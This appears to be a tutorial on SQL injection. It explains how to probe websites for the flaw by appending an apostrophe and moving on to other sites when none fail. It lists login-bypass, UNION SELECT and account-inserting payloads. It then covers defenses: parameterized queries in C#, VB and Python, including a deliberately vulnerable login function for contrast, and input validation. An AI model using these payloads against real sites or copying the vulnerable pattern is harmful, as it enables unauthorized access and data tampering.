The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that is eventually executed by the database. For example: inserting SQL statements such as SELECT, INSERT or UPDATE into input fields so that they are executed against the database.
How to check if a website is vulnerable to SQL INJECTION attack?
Open the website by entering its URL in the browser.
Say http://www.xyz.com/index.php?catid=1
Add a ' (apostrophe) at the end of the URL, so that it looks like
hxxp://www.abcd.com/index.php?catid=1'
If the web page returns a SQL error, the page is vulnerable to SQL injection. If it loads normally, the page is fine, and we have to find some other website and apply the same procedure.
Typical errors you'll see after adding the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_preg_match():
Warning: mysql_result():
Once you get the SQL error or warning, you can move on to the next step, which is to employ cheats on input fields. Attackers enter cheats and queries in the input field to harm the data. Some of the common cheats used during SQL injection are:
------------------------------------------
SQL Injection Cheats
------------------------------------------
Cheats to bypass Login Screens
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' OR '1'='1
' OR 'A'='A
' having 1=1 --
' group by CustNo having 1=1 --
' group by UserID,CustNo having 1=1 --
An attacker may use SQL injection to retrieve data from tables as well. This can be done using the SQL UNION SELECT statement.
'union select sum(UserID) from members --
'union select sum(CustNo) from members --
'; insert into tblCustomers values('5345','deviluser','devilpass','34343434')--
Once an attacker gets into the web page and finds ways to go deeper, he can retrieve, modify or destroy the whole database by appending his own SQL statements.
Ways to protect your website from SQL injection:
Here are two possible ways to protect your web application against SQL injection attacks:
1. Use a stored procedure or a parameterized query rather than a dynamically built SQL query string. Parameters are passed to SQL Server as typed values rather than spliced into the query text, so apostrophes and hyphens in the input are treated as data and cannot change the structure of the statement.
Example of how to use parameterized SQL in ASP.NET (the same SqlParameter mechanism is used to pass arguments to a stored procedure):
C# example
using System.Data;
using System.Data.SqlClient;

// The user-supplied value is bound to @username; it is never concatenated into the SQL text.
string selectCmd = "select * from users where username = @username";
SqlConnection myConnection = new SqlConnection("server=...");
SqlDataAdapter myCommand = new SqlDataAdapter(selectCmd, myConnection);
myCommand.SelectCommand.Parameters.Add(new SqlParameter("@username", SqlDbType.NVarChar, 20));
myCommand.SelectCommand.Parameters["@username"].Value = UserNameField.Value;
DataSet ds = new DataSet();
myCommand.Fill(ds);
Visual Basic example
Imports System.Data
Imports System.Data.SqlClient

' Connection string is a placeholder; the query text itself contains no user input.
Dim MyConnection As New SqlConnection("<connection string>")
Dim SelectCommand As String = "select * from users where username = @username"
Dim MyCommand As New SqlDataAdapter(SelectCommand, MyConnection)
MyCommand.SelectCommand.Parameters.Add(New SqlParameter("@username", SqlDbType.NVarChar, 20))
MyCommand.SelectCommand.Parameters("@username").Value = UserNameField.Value
Dim DS As New DataSet()
MyCommand.Fill(DS)
2. You can add input validation to Web Forms pages by using validation controls. Validation controls provide an easy-to-use mechanism for all common types of standard validation (for example, testing for valid dates or values within a range), plus ways to provide custom-written validation. In addition, validation controls allow you to completely customize how error information is displayed to the user. Validation controls can be used with any controls that are processed in a Web Forms page's class file, including both HTML and Web server controls.
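To show concretely why steps 1 and 2 work, here is an added example that is not from the original post or its ASP.NET snippets: it uses Python's sqlite3 module in place of SQL Server, with a constructed users table and demo credentials. The concatenated query is the pattern the cheats above exploit; the parameterized version and the allow-list validator are the two defences the text describes.

```python
import re
import sqlite3

# Constructed in-memory table for the demo (sqlite3 stands in for SQL Server).
# Real systems store password hashes, not plaintext; kept simple on purpose.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2')")

# Allow-list pattern for a username, the role a RegularExpressionValidator plays in Web Forms.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,20}$")


def login_vulnerable(username: str, password: str) -> bool:
    """Builds the statement by string concatenation: an apostrophe in the input
    closes the literal and whatever follows is parsed as SQL (e.g. admin' --)."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    """Step 1: the same query with placeholders. The driver sends the values
    separately from the SQL text, so ' or -- are compared as data, never parsed."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def validate_username(username: str) -> bool:
    """Step 2: reject input that does not match the expected shape before it
    reaches the database at all."""
    return USERNAME_RE.fullmatch(username) is not None


def login_hardened(username: str, password: str) -> bool:
    """Both defences together: validation first, parameterized query second."""
    return validate_username(username) and login_parameterized(username, password)
```

Run against the login cheats listed earlier, login_vulnerable returns True without a valid password, while login_parameterized and login_hardened return False for the same input and True only for the real credentials.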